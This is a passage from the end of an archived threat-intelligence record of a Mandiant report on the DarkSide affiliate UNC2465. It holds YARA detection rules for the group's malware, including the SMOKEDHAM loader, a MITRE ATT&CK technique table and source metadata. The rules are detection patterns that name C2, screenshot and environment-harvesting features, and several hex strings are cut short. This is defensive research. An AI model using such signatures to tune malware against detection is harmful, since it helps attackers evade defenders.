\"9de326bf37270776b78e30d442bda48b\"\r\nstrings:\r\n$C2Method = { 2E 4D 65 74 68 6F 64 20 3D 20 22 50 4F 53 54 22 } //.Method = \"POST\"\r\n$domainFrontingDomain = /\\.[hH]ost\\s*=\\s*\\\"[^\\\"]*\";/\r\n$envCollection1 = { 45 6E 76 69 72 6F 6E 6D 65 6E 74 2E 47 65 74 45 6E 76 69 72 6F 6E 6D 65 6E 74 56 61 72 69 61\r\n$envCollection2 = { 45 6E 76 69 72 6F 6E 6D 65 6E 74 2E 47 65 74 45 6E 76 69 72 6F 6E 6D 65 6E 74 56 61 72 69 61\r\n$envCollection3 = { 45 6E 76 69 72 6F 6E 6D 65 6E 74 2E 47 65 74 45 6E 76 69 72 6F 6E 6D 65 6E 74 56 61 72 69 61\r\n$functionalityString1 = { 28 22 64 65 6C 61 79 22 29 } //(\"delay\")\r\n$functionalityString2 = { 28 22 73 63 72 65 65 6E 73 68 6F 74 22 29 } //(\"screenshot\")\r\n$functionalityString3 = { 28 22 65 78 69 74 22 29 } //(\"exit\")\r\n$publicStrings1 = \"public string UUID\"\r\n$publicStrings2 = \"public string ID\"\r\n$publicStrings3 = \"public string Data\"\r\n$UserAgentRequest = { 20 3D 20 45 6E 76 69 72 6F 6E 6D 65 6E 74 2E 4F 53 56 65 72 73 69 6F 6E 2E 54 6F 53 74 72\r\ncondition:\r\nfilesize \u003c 1MB and all of them\r\n}\r\nrule Loader_Win_SMOKEDHAM\r\n{\r\nmeta:\r\nauthor = \"Mandiant\"\r\ndate_created = \"2021-06-10\"\r\nmd5 = \"05d38c7e957092f7d0ebfc7bf1eb5365\"\r\nstrings:\r\n$listedDLLs1 = \"System.Drawing.dll\" fullword\r\n$listedDLLs2 = \"System.Web.Extensions.dll\" fullword\r\n$listedDLLs3 = \"System.Windows.Forms.dll\" fullword\r\n$CSharpLang = {2d 4c 61 6e 67 75 61 67 65 20 43 53 68 61 72 70} // -Language CSharp\r\n$StringConversion = \"convertto-securestring\" nocase\r\n$SecureString1 = {5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2\r\n$SecureString2 = {5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2\r\ncondition:\r\nfilesize \u003c 1MB and (1 of ($listedDLLs*)) and $CSharpLang and $StringConversion and 
$SecureString1 and $SecureStr\r\n}\r\nMITRE ATT\u0026CK UNC2465\r\nTactic | Description\r\nInitial Access | T1189: Drive-by Compromise; T1195.002: Compromise Software Supply Chain; T1566: Phishing\r\nExecution | T1053.005: Scheduled Task; T1059.001: PowerShell; T1059.005: Visual Basic\r\nPersistence | T1098: Account Manipulation; T1136: Create Account; T1547.001: Registry Run Keys / Startup Folder; T1547.004: Winlogon Helper DLL; T1547.009: Shortcut Modification\r\nDefense Evasion | T1027: Obfuscated Files or Information; T1070.006: Timestomp; T1112: Modify Registry; T1140: Deobfuscate/Decode Files or Information; T1218.005: Mshta; T1553.002: Code Signing; T1562.004: Disable or Modify System Firewall\r\nDiscovery | T1012: Query Registry; T1033: System Owner/User Discovery; T1082: System Information Discovery\r\nCollection | T1056.001: Keylogging; T1113: Screen Capture; T1560: Archive Collected Data\r\nImpact | T1486: Data Encrypted for Impact; T1531: Account Access Removal\r\nCommand and Control | T1071.001: Web Protocols; T1090.004: Domain Fronting; T1102: Web Service; T1105: Ingress Tool Transfer; T1219: Remote Access Software; T1572: Protocol Tunneling; T1573.002: Asymmetric Cryptography\r\nLateral Movement | T1021.004: SSH; T1021.005: VNC\r\nCredential Access | T1003.001: LSASS Memory\r\nResource Development | T1588.003: Code Signing Certificates; T1588.004: Digital Certificates; T1608.003: Install Digital Certificate\r\nAcknowledgements\r\nThanks to everyone that contributed analysis and review. 
Special thanks to Alison Stailey, Joseph Reyes, Nick Richard, Andrew Thompson, Jeremy Kennelly, Joshua Sablatura, Evan Reese, Van Ta, Stephen Eckels, and Tufail Ahmed.\r\nPosted in: Threat Intelligence, Security \u0026 Identity\r\nSource: https://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise"
	],
	"report_names": [
		"darkside-affiliate-supply-chain-software-compromise"
	],
	"threat_actors": [
		{
			"id": "e9f7f836-b77f-4f95-aa02-9e99d32faf1d",
			"created_at": "2024-12-21T02:00:02.857057Z",
			"updated_at": "2026-04-10T02:00:03.791142Z",
			"deleted_at": null,
			"main_name": "UNC2465",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC2465",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434079,
	"ts_updated_at": 1775826692,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a9c4c67a8b0ee1573b20b31467145049d39216b5.pdf",
		"text": "https://archive.orkl.eu/a9c4c67a8b0ee1573b20b31467145049d39216b5.txt",
		"img": "https://archive.orkl.eu/a9c4c67a8b0ee1573b20b31467145049d39216b5.jpg"
	}
}